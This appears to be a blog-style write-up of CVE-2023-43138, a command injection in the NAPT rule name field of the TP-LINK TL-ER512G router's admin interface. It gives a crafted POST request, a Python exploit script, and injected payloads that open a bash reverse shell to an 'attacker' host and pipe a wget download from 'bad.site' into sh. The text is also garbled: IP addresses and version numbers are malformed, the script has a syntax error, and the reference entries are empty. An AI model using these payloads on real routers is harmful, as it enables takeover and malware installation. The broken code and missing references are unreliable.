---
TP-LINK routers are common in small businesses and homes thanks to their affordable price and feature set. However, some models, like the TL-ER512G V4, firmware 2.. Build 210817 Rel.80868n, carry serious vulnerabilities. CVE-2023-43138 is one such critical flaw: it allows authenticated attackers to execute commands on the router’s system just by crafting a malicious NAPT rule.
This article explains, in clear language, how the vulnerability works, how attackers exploit it, and why you need to patch your router. We’ll walk through proof-of-concept (PoC) code, remediation, and official references to help you understand and mitigate the issue.
What is CVE-2023-43138?
A command injection occurs when an application passes unsafe user input to a system shell. In CVE-2023-43138, an attacker can inject system commands using the “name” field while creating a NAPT rule in the router’s web interface.
Here’s what this means
- You must be logged in to the router’s web interface (default on port 80/443).
- While adding a NAPT (Network Address Port Translation) rule, you insert Linux shell characters (like ;, &&) in the “name” field.
The Vulnerable Endpoint
On the TP-LINK TL-ER512G (tested on V4 2.. Build 210817 Rel.80868n), after login, you can navigate to *Transmission > NAPT* and add a port forwarding/NAPT rule.
Let’s see a simplified POST request that the admin interface sends when you add a NAPT rule
POST /goform/AdvNat?rand=123456789 HTTP/1.1
Host: 192.168..1
Cookie: SESSIONID=abcdef123456789
Content-Type: application/x-www-form-urlencoded
op=add&name=NORMAL&proto=&extIp=&extPort=&intIp=192.168..100&intPort=80
If you insert shell metacharacters into the name field, like this
name=POC;id>/tmp/hacked.txt
the router backend processes it in a dangerous way—your injected command (id>/tmp/hacked.txt) gets executed.
Here’s a Python snippet to demonstrate the exploit, assuming you have an admin session cookie
import requests
router_ip = "192.168..1"
session_cookie = "abcdef123456789" # Update as needed
evil_name = "POC;id>/tmp/hacked.txt"
payload = {
"op": "add",
"name": evil_name,
"proto": "",
"extIp": "",
"extPort": "",
"intIp": "192.168..123",
"intPort": "2222"
}
headers = {
"Cookie": f"SESSIONID={session_cookie}",
"Content-Type": "application/x-www-form-urlencoded"
}
r = requests.post(f"http://{router_ip}/goform/AdvNat?rand=1337";,
data=payload,
headers=headers)
print("Sent payload. Check /tmp/hacked.txt on router.")
The system command in the name field runs when the router processes the NAPT rule.
- A file /tmp/hacked.txt is created on the system, containing the output of id.
With this, an attacker with admin access can
- Start a reverse shell: name=rshell;bash -i >& /dev/tcp/attacker/4444 >&1
- Download/execute malware: name=evil;wget http://bad.site/s -O- | sh
How to Fix & Protect
TP-LINK has issued firmware updates for this problem on affected models.
Update your router firmware immediately—especially if your router WAN interface is exposed on the Internet.
Download the latest TL-ER512G firmware:
NVD Record:
Official TP-LINK Advisory:
Security Advisory on Command Injection Vulnerability (July 2023)
- Community Discussion / Exploit Details:
- Exploit in the wild (Exploit-DB)
- Github PoC, when available
Conclusion
CVE-2023-43138 is a critical command injection vulnerability that exposes TP-LINK TL-ER512G routers to takeover if the attacker gains admin credentials. While authentication is needed, default or weak passwords are all too common. Patch now. If you run any version before the latest fixed firmware, your network is at risk.
Stay updated, use strong passwords, and never expose router admin panels on the public Internet.
For more technical details or help with detection, feel free to reach out in the references above.
*This article is independent and written for educational and defensive purposes only. Misuse of this information is illegal.*
Timeline
Published on: 09/20/2023 20:15:12 UTC
Last modified on: 09/22/2023 02:12:01 UTC